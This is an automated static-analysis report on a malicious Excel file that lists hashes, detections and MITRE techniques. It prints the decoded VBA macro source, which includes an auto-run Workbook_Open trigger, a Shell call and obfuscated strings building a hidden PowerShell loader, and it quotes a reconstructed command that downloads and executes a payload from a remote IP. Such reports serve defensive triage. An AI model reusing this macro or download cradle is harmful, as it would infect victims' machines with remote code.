Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6602f118eea649f8…

MALICIOUS

Office (OLE)

137.5 KB Created: 2019-02-15 12:29:11 Authoring application: Microsoft Excel First seen: 2019-02-26
MD5: a9dca658ba431a4123be8aa3f13284bc SHA-1: f5925d14b445ffcd29b72c70e7682b07ba5dad6b SHA-256: 6602f118eea649f863e5662671686a3ae5e1067e1c1bcbed829d7ba8ab3390f6
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel spreadsheet containing VBA macros, specifically a Workbook_Open macro that triggers the execution of a PowerShell command. This command, reconstructed as 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://185.143.223.175/payload.ps1')"', is designed to download and execute a second-stage payload from a remote URL. The ClamAV detection 'Xls.Malware.Powload-6862214-0' further confirms its malicious nature.

Heuristics 5

  • ClamAV: Xls.Malware.Powload-6862214-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Powload-6862214-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7991 bytes
SHA-256: 68832d0503dfa21580ffb93cd714cb2935734c307655bb9596b92f61decbe907
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function Select_t()
Select_t = Format(0, "currency")
End Function
Function Teams()
Teams = yoo(")#|9!!0d!#tfu!!mbeoJ>!/!)!%FOW;dpntQFd\5-35-36^.KpjO((*)OFx.PCKFDU!!tztUfN/JP/dPnQSFttJPo/eFgmbUFtUsFBn)\tZtufn/Jp/NfnpSztusfBN^!\dPoWfSu^;;gsPncbtF75TuSjoh)!dne")
End Function
Function Drawiiiingsimg()
Drawiiiingsimg = yoo("&{hp&#!*-\TztuFN/JP/DPNqSftTJpO/dPNqSfttJPonPef^;;eFdpNQsFTT!*!_}gPsfBdi|OFx.PCKFDU!!tztuFn/jP/tUsfbNSFBEFs)!%`!-!\tZtUfN/ufyu/foDpejoh^;;bTDJj!*~_}gpSFbdi!|%`/SfbeupFOE)*~*!''Tfu!![hp>qPXFsTIFmM!!.FYfDvu!!CZqBTt!!.opojoUFsB!.OpMp!.opQs!.X!2!!!!)/)!!]#|2~|1~|3~]#!.g!(uF(-(DijMeJ(-(n(!!*!)!]#|1~|2~]#!.g!(FOw;(-(MbeOJ(!!*!*/]#wBaMvf]#!!___}___'!)]#|2~|1~]#.g!(y(-(Jf(!!*''!!dne!!0d!QG(*")
End Function
Sub Workbook_Open()
If Len(Select_t) = msoContactCardTypeUnknownContact Then FullCalculations Else Application.Quit
End Sub
Sub FullCalculations()
ChangeSheets = Shell#(Teams + Quit_Quit & Drawiiiingsimg, xlExponential - 5)
End Sub
Function Text_text()
Text_text = "2}{29}{19}{50}{59}{90}{84}{83}{17}{89}{68}{21}{87}{75}{24}{32}{93}{36}{80}{40}{35}{64}{42}{25}{61}{31}{71}{10}{73}{57}{54}{60}{72}{5}{86}{33}{76}{69}{38}{18}{30}{49}{74}{53}{39}{16}{0}{52}{98}{15}{101}{91}{48}{9}{100}{78}{37}{97}{56}{13}{43}{11}{2}{41}{88}{27}{1}{94}{12}{8}{55}{14}{70}{45}{44}{22}{46}{65}{62}{85}{79}{34}{7}{77}{67}{81}{66}{58}{23}{99}{95}{92}{63}{4}{96}{20}{51}{28}{6}{47}{26}{3}"" -f'Wd95+YpnMzWMtgu73X/dtmbSM37H3srtd7Sq/mnDn1zPZ+/fSRwqaRSwEVHJXTJ22mR7','3WQT0x415vvU59S7f4gY8/aE0Ii6pULXRKz01cWuAYSsPcYooW6E','NCW+iuUCMMK48tyJFXJORCY3t30h4Yo7E+waMmnQrqj1BW7oLrPoQvMbP/SQq','sAmICZnvf7/wc=','YnvaW','y2r7Vh9/uBn6','IlCvR+g7b/aDThV','y+I8pvtQBW','QHfRkkW000WRy8Ry0XbzY7Onu1CECz9eJOVl5tFEmlPMwdBDZ+lCou63X02HdJO1U2jCN/DxD3ZXrK/mLrL9txxUUSZSnaai4I0FhCdVZTzN8ncW44DgA','vYXBM5kMqn','cUOXxcjiDN3qAnjgUBMtqOKpLo6J','GNbnLCZeYjV16RnfyKnGN+mF0+7C6e7HUi5ty6xZIo5krFEkptzxN+wsPWaP1cFvm5eRTxdyLeFIUb','mJef+OO/D1i4x3Nvi','DFoy+a6Nilj5y"
Text_text = Text_text & "jFt1N1HshvCQ7V4yRaIMnCOBi5roEH6vtVWAjETxElh6+PLlYifTeWv/GfcqsXPfHD83ZjtWDruXOSEhdyMWbnBnD+4p3P','iV7EkrYmL9y9h9+AKMS5vLzFU+B9FJlkuLJQa7Q+83qN6','8BaoASTKJUwc8+jPvr01o','nvaVcFMbDKfsea/LswQCk02fkGfw7g8BzpV+ryB+aI62p+OpS','4a4AxSJMleA5B2BlZBuoITRQvUVBkUUYCwiK+sP5wj6dun5MXZK31+XH9++/82JofxL3d9N/0sPXl5F3nJThloxXHcZnNvHBU7ZEGsGTgq8qm2TwjdP','EPCciNSfwQ8xUfYwAW5ZQkvq3Lv6xs33DRP/YKfz33L9KElgtmd1f85CWZfaqMTxGqvImuhr6YXUCXF1XiVgfv4NpWr5+Cj9ZCtIKk40yTWnEzUo8fxYIHq+Hzn1/mbc','jHq8b+/3TOoiXt57lWnDhUcmOnu6Xs3kwfDfQxcO/bnsyyJIjecBJsvv/6aDujcctJ','l89RBa8ZQ5NSTFjgF9OKOVTUvp64k1c8Ri5l9Qj64n8yWuUFxSgWdcS8FiZr8H0mCYyFX6YNgfOjuJqN3w05w/','3grFGag3SW0tNopSJ6UmPR','qfsYcTCDyq8cTKWKOdlQU4nSV2IJwaYhJfKZkEmWEJM8lWTMJM','5RD7qCvbzVVaqnqmk8PBcwGYKZhXIfIYS0fu51lWwvb3YbanZ2H9mwEhX7mim','5UYFeLwfCMFjyspVVCbU3kA','bg9epowYvk6AZTNRaYTQE','033194TqcMGRD0BB','+T1WL7D+mTjP3Mn2195mL','UyhQr1pF','rc6LM0n/FsvI+iWc3BrxFn639MCCiRjEgXlNbZxAIkoC6g','C1bjsEzGub4wFDTRnkEenRlV','ww3yrv+zr5wRwbesRhqZXlNOmwdsCC"
End Function
Function Quit_Quit()
Quit_Quit = Text_text & Math_func$ + Appersands & ByVals$
End Function
Function Math_func$()
Math_func = "EUxXW7Mn1QkcGOLWM7A2cFaTvCb80Bpb9nt','mkTskJpWx5XZQtARkR+Jm0PlFVVy','B2opun5OiapArBMJKkLTBuKJskw6h56cVfVkVahKq2VjgyCw8jFhOdEB6SOoKgYpuJ+wFXPr5','5nCCk8+GGaZG7XpE+3cdZgYNUKDrgJ','AEzE','/HRMmweEOU1+YqjsiZbHNU1KYOmAT3X/DoeaAJRjMANFdIKNWGSB/nzwdZR+wDAH+JW0BQnM2MxGfRW','A5pjseDDC2A4uM6mry06IAyMtMup5pJ66RKGeXP','CUlMk5I7TUu6FIMKQgmJVZYxgfYAkvQuiRhhECeCIgq','VPA+UYyTih','ts28ny+B8rFy0NyT49A3kEc2','3W58BIyARk5fvxe4bIIyfE9E6vEtSsmumXCvdz9e54oJ7w5CgUb+7izcCOO7bJ0UCnykIe7wNiIQNL','x','MoBkLZib9l02IFT5v80PJQ9mkcL369wZnQgp+ZmF3MEN','Sc5Cti91SpkO6FUChnkJNKo1MpZu+4uxX','oNeiJOIviHGxM2w6HAtneudpI38IKR7fBWaCHNu5C9uiPOjULGpQMIyiF/gpV100yFE449HOlSswc5IcXpj2GesXuwXznY8XuxjEjZg3vFK','J4buHCJkZLvKVO
... (truncated)